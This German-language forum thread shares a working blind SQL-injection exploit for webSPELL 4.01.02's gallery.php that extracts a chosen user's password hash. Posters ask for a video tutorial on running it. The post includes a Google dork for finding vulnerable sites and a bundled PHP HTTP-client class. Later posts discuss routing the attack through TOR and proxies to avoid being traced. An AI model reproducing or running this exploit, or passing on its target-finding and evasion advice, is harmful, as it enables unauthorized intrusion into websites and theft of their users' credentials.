[S] v.tut / webSPELL 4.01.02 exploit tutorial

[hersch24]

Suche v.tut wie webSPELL 4.01.02 exploitet wird mit nem milw0rm php exploit

[Rec.127]

mit dem da ?

Code:

<?php

//webSPELL SQL-injection exploit in gallery.php
$xpl = new phpsploit();
$xpl->allowredirection(1);
$xpl->cookiejar(1);

function istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h){
	$xpl->get("http://".$host.$path."gallery.php?action=window&galleryID=".$gid."&picID=".$pid."%20AND%20MID((SELECT%20password%20FROM%20".$prefix."user%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")");
	$response=$xpl->getcontent();
	$regex='/<html><head><title>webSPELL Diashow: (.+?)<\/title>/';
	if (preg_match($regex,$response)) {
		return true;
	}
	else return false;
}
if($_SERVER['argc']==7 or $_SERVER['argc']==8){
	$host=$_SERVER['argv'][1];
	$path=$_SERVER['argv'][2];
	$prefix=$_SERVER['argv'][3];
	$gid=$_SERVER['argv'][4];
	$pid=$_SERVER['argv'][5];
	$uid=$_SERVER['argv'][6];
	if($_SERVER['argc']==8){
		$proxy=$_SERVER['argv'][7];
		echo "Proxy: $proxy \n";
		$xpl->proxy($proxy);	
	}
	$xpl->agent('Internet Explorer');
	echo"exploiting...\n";
	echo"md5-hash: ";
	for ($i=1;$i<=32;$i++){
		$found=false;
		$h=48;
		while (!$found and $h<=57) {
			if(istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h)){
				$found=true;
				echo chr($h);
			}
			$h++;
		}
		if(!$found){
			$h=97;
			while (!$found and $h<=122) {
				if(istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h)){
					$found=true;
					echo chr($h);
				}
				$h++;
			}
		}
	}
}
else{
	echo"\n\n";
	echo"|=======webSPELL v4.01.02 gallery.php SQL Injection========\n";
	echo"|\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] [prefix] [valid GalleryID] [valid PicID] [valid UserID] ([Proxy-IP:Port])\n|\n";
	echo"|Example (with Proxy): php ".$_SERVER['argv'][0]." localhost /webspell/ webs_ 1 1 1 192.168.1.1:80\n|\n";
	echo"|Example (without Proxy): php ".$_SERVER['argv'][0]." localhost /webspell/ webs_ 1 1 1\n|\n";
	echo"|Notes: This exploit works regardless of the PHP security settings (magic_quotes, register_globals)\n";
	echo"|       This exploit is only for educational use, use it on your own risk!\n";
	echo"|       Exploiting scripts without permission of the owner of the webspace is illegal!\n";
	echo"|       I'm not responsible for any resulting damage\n|\n";
	echo"|Google Dork: \"this site is using the webspell script (version: 4.01.02)\"\n|\n";
	echo"|Exploit found by r00t (rootcoding@gmail.com)\n";
}

/*
* 
* Copyright (C) darkfig
* 
* This program is free software; you can redistribute it and/or 
* modify it under the terms of the GNU General Public License 
* as published by the Free Software Foundation; either version 2 
* of the License, or (at your option) any later version. 
* 
* This program is distributed in the hope that it will be useful, 
* but WITHOUT ANY WARRANTY; without even the implied warranty of 
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
* GNU General Public License for more details. 
* 
* You should have received a copy of the GNU General Public License 
* along with this program; if not, write to the Free Software 
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
* 
* TITLE:          PhpSploit Class
* REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4)
* VERSION:        1.1
* LICENSE:        GNU General Public License
* ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME:       phpsploitclass.php
*
* CONTACT:        gmdarkfig@gmail.com (french / english)
* GREETZ:         Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
* [2006-12-31] (1.1)
*  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
*  * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
*  * First version
* 
*/

class phpsploit {

	/**
	* This function is called by the get()/post() functions.
	* You don't have to call it, this is the main function.
	*
	* @return $server_response
	*/
	private function sock()
	{
		if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
		else $socket = fsockopen($this->host,$this->port);
		
		if(!$socket) die("Error: The host doesn't exist");
		
		if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
		elseif($this->method==="post") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
		else die("Error: Invalid method");
		
		if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
		$this->packet .= "Host: ".$this->host."\r\n";
		
		if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n";
		if(!empty($this->header)) $this->packet .= $this->header."\r\n";
		if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
		
		$this->packet .= "Connection: Close\r\n";
		if($this->method==="post")
		{
			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data."\r\n";
		}
		$this->packet .= "\r\n";
		$this->recv = '';
		
		fputs($socket,$this->packet);
		while(!feof($socket)) $this->recv .= fgets($socket);
		fclose($socket);
		
		if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
		if($this->allowredirection) return $this->allowredirection($this->recv);
		else return $this->recv;
	}
	

	/**
	* This function allows you to add several cookie in the
	* request. Several methods are supported:
	* 
	* $this->addcookie("name","value");
	* or
	* $this->addcookie("name=newvalue");
	* or
	* $this->addcookie("othername=overvalue; xx=zz; y=u");
	* 
	* @param string $cookiename
	* @param string $cookievalue
	* 
	*/
	public function addcookie($cookn,$cookv='')
	{
		// $this->addcookie("name","value"); work avec replace
		if(!empty($cookv))
		{
			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
			if(!empty($this->cookie))
			{
				if(preg_match("/$cookn=/",$this->cookie))
				{
					$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
				}
				else
				{
					$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
				}
			}
			else
			{
				$this->cookie = $cookn."=".$cookv.";";
			}
		}
		// $this->addcookie("name=value; othername=othervalue");
		else
		{
			if(!empty($this->cookie))
			{
				$cookn = preg_replace("/(.*);$/","$1",$cookn);
				$cookarr = explode(";",str_replace(" ", "",$cookn));
				for($i=0;$i<count($cookarr);$i++)
				{
					preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches);
					$cookn = $matches[1];
					$cookv = $matches[2];
					$this->addcookie($cookn,$cookv);
				}
			}
			else
			{
				$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
				$this->cookie = $cookn;			
			}
		}
	}
	
	
	/**
	* This function allows you to add several headers in the
	* request. Several methods are supported:
	*
	* $this->addheader("headername","headervalue");
	* or
	* $this->addheader("headername: headervalue");
	*
	* @param string $headername
	* @param string $headervalue
	*/
	public function addheader($headern,$headervalue='')
	{
		// $this->addheader("name","value");
		if(!empty($headervalue))
		{
			if(!empty($this->header))
			{
				if(preg_match("/$headern:/",$this->header))
				{
					$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
				}
				else
				{
					$this->header .= "\r\n".$headern.": ".$headervalue;
				}
			}
			else
			{
				$this->header=$headern.": ".$headervalue;
			}
		}
		// $this->addheader("name: value");
		else 
		{
			if(!empty($this->header))
			{
				$headarr = explode(": ",$headern);
				$headern = $headarr[0];
				$headerv = $headarr[1];
				$this->addheader($headern,$headerv);
			}
			else
			{
				$this->header=$headern;
			}
		}
	}
	

	/**
	* This function allows you to use an http proxy server.
	* Several methods are supported:
	* 
	* $this->proxy("proxyip","8118");
	* or
	* $this->proxy("proxyip:8118")
	*
	* @param string $proxyhost
	* @param integer $proxyport
	*/
	public function proxy($proxy,$proxyp='')
	{
		// $this->proxy("localhost:8118");
		if(empty($proxyp))
		{
			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
			$proxh = $proxarr[1];
			$proxp = $proxarr[2];
			$this->proxyhost=$proxh;
			$this->proxyport=$proxp;
		}
		// $this->proxy("localhost",8118);
		else 
		{
			$this->proxyhost=$proxy;
			$this->proxyport=intval($proxyp);
		}
		if($this->proxyport > 65535) die("Error: Invalid port number");
	}
	

	/**
	* This function allows you to use an http proxy server
	* which requires a basic authentification. Several
	* methods are supported:
	* 
	* $this->proxyauth("darkfig","dapasswd");
	* or
	* $this->proxyauth("darkfig:dapasswd");
	*
	* @param string $proxyuser
	* @param string $proxypass
	*/
	public function proxyauth($proxyauth,$proxypasse='')
	{
		// $this->proxyauth("darkfig:password");
		if(empty($proxypasse))
		{
			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
			$proxu = $proxautharr[1];
			$proxp = $proxautharr[2];
			$this->proxyuser=$proxu;
			$this->proxypass=$proxp;
		}
		// $this->proxyauth("darkfig","password");
		else
		{
			$this->proxyuser=$proxyauth;
			$this->proxypass=$proxypasse;
		}
	}

	
	/**
	* This function allows you to set the "User-Agent" header.
	* Several methods are possible to do that:
	* 
	* $this->agent("Mozilla Firefox");
	* or
	* $this->addheader("User-Agent: Mozilla Firefox");
	* or
	* $this->addheader("User-Agent","Mozilla Firefox");
	* 
	* @param string $useragent
	*/
	public function agent($useragent)
	{
		$this->agent=$useragent;
	}

	
	/**
	* This function returns the header which will be
	* in the next request.
	* 
	* $this->showheader();
	*
	* @return $header
	*/
	public function showheader()
	{
		return $this->header;
	}

	
	/**
	* This function returns the cookie which will be
	* in the next request.
	* 
	* $this->showcookie();
	*
	* @return $storedcookies
	*/
	public function showcookie()
	{
		return $this->cookie;
	}

	
	/**
	* This function returns the last formed
	* http request (the http packet).
	* 
	* $this->showlastrequest();
	* 
	* @return $last_http_request
	*/
	public function showlastrequest()
	{
		return $this->packet;
	}
	
	
	/**
	* This function sends the formed http packet with the
	* GET method. You can precise the port of the host.
	* 
	* $this->get("http://localhost");
	* $this->get("http://localhost:888/xd/tst.php");
	* 
	* @param string $urlwithpath
	* @return $server_response
	*/
	public function get($url)
	{
		$this->target($url);
		$this->method="get";
		return $this->sock();
	}

	
	/**
	* This function sends the formed http packet with the
	* POST method. You can precise the port of the host.
	* 
	* $this->post("http://localhost/index.php","admin=1&user=dark");
	*
	* @param string $urlwithpath
	* @param string $postdata
	* @return $server_response
	*/	
	public function post($url,$data)
	{
		$this->target($url);
		$this->method="post";
		$this->data=$data;
		return $this->sock();
	}

	
	/**
	* This function returns the content of the server response
	* without the headers.
	* 
	* $this->getcontent($this->get("http://localhost/"));
	* or
	* $this->getcontent();
	*
	* @param string $server_response
	* @return $onlythecontent
	*/
	public function getcontent($code='')
	{
		if(empty($code)) $code = $this->recv;
		$content = explode("\n",$code);
		$onlycode = '';
		for($i=1;$i<count($content);$i++)
		{
			if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1;
			if($ok) $onlycode .= $content[$i]."\n";
		}
		return $onlycode;
	}

	
	/**
	* This function returns the headers of the server response
	* without the content.
	* 
	* $this->getheader($this->post("http://localhost/x.php","x=1&z=2"));
	* or
	* $this->getheader();
	*
	* @param string $server_response
	* @return $onlytheheaders
	*/
	public function getheader($code='')
	{
		if(empty($code)) $code = $this->recv;
		$header = explode("\n",$code);
		$onlyheader = $header[0]."\n";
		for($i=1;$i<count($header);$i++)
		{
			if(!preg_match("/^(\S*):/",$header[$i])) break;
			$onlyheader .= $header[$i]."\n";
		}
		return $onlyheader;
	}

	
	/**
	* This function is called by the cookiejar() function.
	* It adds the value of the "Set-Cookie" header in the "Cookie"
	* header for the next request. You don't have to call it.
	* 
	* @param string $server_response
	*/
	private function getcookie($code)
	{
		$carr = explode("\n",str_replace("\r\n","\n",$code));
		for($z=0;$z<count($carr);$z++)
		{
			if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr))
			{
				$cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1]));
			}
		}

		for($i=0;$i<count($cookie);$i++)
		{
			preg_match("/(\S*)=(\S*);/",$cookie[$i],$matches);
			$cookn = $matches[1];
			$cookv = $matches[2];
			$this->addcookie($cookn,$cookv);
		}
	}

	
	/**
	* This function is called by the get()/post() functions.
	* You don't have to call it.
	*
	* @param string $urltarg
	*/
	private function target($urltarg)
	{
		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
		$this->url=$urltarg;
		
		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
		$this->host=$array[0];

		preg_match("/:(\d+)\//",$urltarg,$matches);
		$this->port=empty($matches[1]) ? 80 : $matches[1];
		
		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
		preg_match("/\/(.*)\//",$temp,$matches);
		$this->path=str_replace("//","/","/".$matches[1]."/");
		
		if($this->port > 65535) die("Error: Invalid port number");
	}
	
	
	/**
	* If you call this function, the script will
	* extract all "Set-Cookie" headers values
	* and it will automatically add them into the "Cookie" header
	* for all next requests.
	*
	* $this->cookiejar(1); // enabled
	* $this->cookiejar(0); // disabled
	* 
	*/
	public function cookiejar($code)
	{
		if($code===0) $this->cookiejar='';
		if($code===1) $this->cookiejar=1;
		else
		{
			$this->getcookie($code);
		}
	}


	/**
	* If you call this function, the script will
	* follow all redirections sent by the server.
	* 
	* $this->allowredirection(1); // enabled
	* $this->allowredirection(0); // disabled
	* 
	* @return $this->get($locationresponse)
	*/
	public function allowredirection($code)
	{
		if($code===0) $this->allowredirection='';
		if($code===1) $this->allowredirection=1;
		else
		{
			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
			{
				$location = str_replace(chr(13),'',$codearr[2]);
				if(!eregi("://",$location))
				{
					return $this->get("http://".$this->host.$this->path.$location);
				}
				else
				{
					return $this->get($location);
				}
			}
			else
			{
				return $code;
			}
		}
	}
	
	
	/**
	* This function allows you to reset some parameters:
	* 
	* $this->reset(header); // headers cleaned
	* $this->reset(cookie); // cookies cleaned
	* $this->reset();       // clean all parameters
	*
	* @param string $func
	*/
	public function reset($func='')
	{
		switch($func)
		{
		case "header":
			$this->header='';
			break;
			
		case "cookie":
			$this->cookie='';
			break;
			
		default:
			$this->cookiejar='';
			$this->header='';
			$this->cookie='';
			$this->allowredirection=''; 
			$this->agent='';
			break;
		}
	}
}

?>

wenn ja

1. weisst du wie man einen php exploit ausführt
2. weisst du ob deine seite vulnerable ist

mfg

[AASF]

Ich werde dir heute eins machen!!!!!


Ich habe schon n Tut gemacht, dass zeigt wie man PERL exploits ausführt (binn es am hochladen) aber, das is wirklich für Anfänger!!

Aso, das Tut geht 19 Minuten, und ich habe alles genaustens erklärt (nach meinem Wissen)


Ok, ich werde es heute mal machen :lol:

[fake2006]

ja gut AASF, und zeig mal bitte auch wie du das mitn proxy machst, also das explo.

weil das tut was du schon gemacht hast , hast du ohne proxy gemacht ^^
das einloggen auf der page sowie das exploiten.

zeig das mal bitte, würd ich ma gerne wissen

mfg fake

[AASF]

Ok...


kann ich machen, wenn ich einen guten Proxy gefunden habe

[fake2006]

Ok...


kann ich machen, wenn ich einen guten Proxy gefunden habe

nihm das TOR paket ( privoxy + TOR + vidalia )

und dan halt noch den tor button für mozilla und dan ab die post

und finden tust du es hier

Code:

tor.eff.org

aber was ich wissen möchte ist, wie man ein proxy server beim exploiten einbinded, über das CMD fenster halt. wen man den von dort aufruft.
das muss ja auch ihrgend wie geschützt werden....

mfg. Fake

[AASF]

Genau das meine ich ^^

Ich benutze eigentlich auch TOR, aber naja, ich habe keinen guten Proxy, aber ich zeige euch, wie man es auführen würde

[AASF]

http://rapidshare.com/files/33008233...with_Proxy.rar


Es geht dieses mal nur 13 Minuten

Ich weiss, es is immernoch zu lang, aber naja, shit happens :roll:


PW ist wieder keins drauf